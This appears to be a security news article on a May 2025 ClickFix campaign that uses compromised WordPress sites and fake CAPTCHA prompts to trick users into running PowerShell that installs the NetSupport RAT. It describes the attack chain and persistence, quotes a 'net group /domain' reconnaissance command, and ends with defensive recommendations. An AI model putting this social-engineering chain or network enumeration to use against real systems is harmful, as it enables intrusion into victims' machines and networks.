In a recent wave of cyberattacks, threat actors have been leveraging compromised WordPress websites to distribute the NetSupport Remote Access Trojan (RAT) through a sophisticated social engineering method known as ClickFix. This campaign, identified by the Cybereason Global Security Operations Center (GSOC) in May 2025, underscores the evolving tactics of cybercriminals who repurpose legitimate tools for malicious purposes.
Understanding NetSupport RAT
NetSupport Manager, originally developed as a legitimate remote administration tool for IT support, has been co-opted by cybercriminals into a Remote Access Trojan (RAT). This transformation allows attackers to gain unauthorized control over infected systems, enabling activities such as screen monitoring, file transfers, and execution of malicious commands. The misuse of NetSupport Manager in this manner has been documented in various campaigns, including those involving fake browser updates and compromised websites. ([blogs.vmware.com](https://blogs.vmware.com/security/2023/11/netsupport-rat-the-rat-king-returns.html?utm_source=openai))
The ClickFix Attack Chain
The ClickFix technique represents a multi-stage attack chain that combines website compromise with psychological manipulation to bypass modern security defenses. The attack unfolds as follows:
1. Initial Compromise: Users are lured through phishing emails, malicious PDF attachments, or links on gaming websites, redirecting them to compromised WordPress sites.
2. Malicious Script Execution: Upon visiting these infected pages, hidden JavaScript code within the website’s meta description automatically loads and executes a remote script named j.js from a malicious domain.
3. System Profiling: The script identifies the user’s operating system and browser details, employing local storage tracking to determine if the user has previously visited the site, thereby minimizing exposure.
4. Fake CAPTCHA Prompt: Victims are presented with a counterfeit CAPTCHA verification page, designed with modern frameworks to appear legitimate. This page instructs users to press Windows + R and paste a verification code into the Run dialog box.
5. Execution of Malicious Command: Unbeknownst to the user, the verification code is a malicious PowerShell command that, when executed, downloads and installs the NetSupport Client software, granting attackers remote access to the system.
Post-Infection Activities
Once installed, the NetSupport Client establishes a persistent connection to command-and-control servers, often located in regions like Moldova. The malware creates registry entries to ensure persistence across system reboots, allowing attackers to maintain long-term access to compromised systems.
Within hours of a successful compromise, threat actors have been observed conducting reconnaissance activities, including querying Active Directory for domain computers and transferring files to public directories. They utilize NetSupport’s legitimate remote command prompt feature to execute commands such as net group /domain ‘Domain Computers’ to map the network infrastructure.
Broader Implications and Recommendations
The misuse of legitimate tools like NetSupport Manager highlights a growing trend among cybercriminals to blend malicious activities with normal IT operations, making detection more challenging. Security experts recommend the following measures to mitigate such threats:
– Immediate Isolation: Isolate affected systems to prevent further spread of the malware.
– Credential Resets: Reset passwords for compromised accounts to regain control.
– Blocking Malicious Domains: Block identified malicious domains and IP addresses associated with the attack.
– Monitoring PowerShell Activity: Implement monitoring for unusual PowerShell activity, as it is often used in such attacks.
By understanding the tactics employed in the ClickFix campaign and implementing robust security measures, organizations can better defend against the evolving landscape of cyber threats.
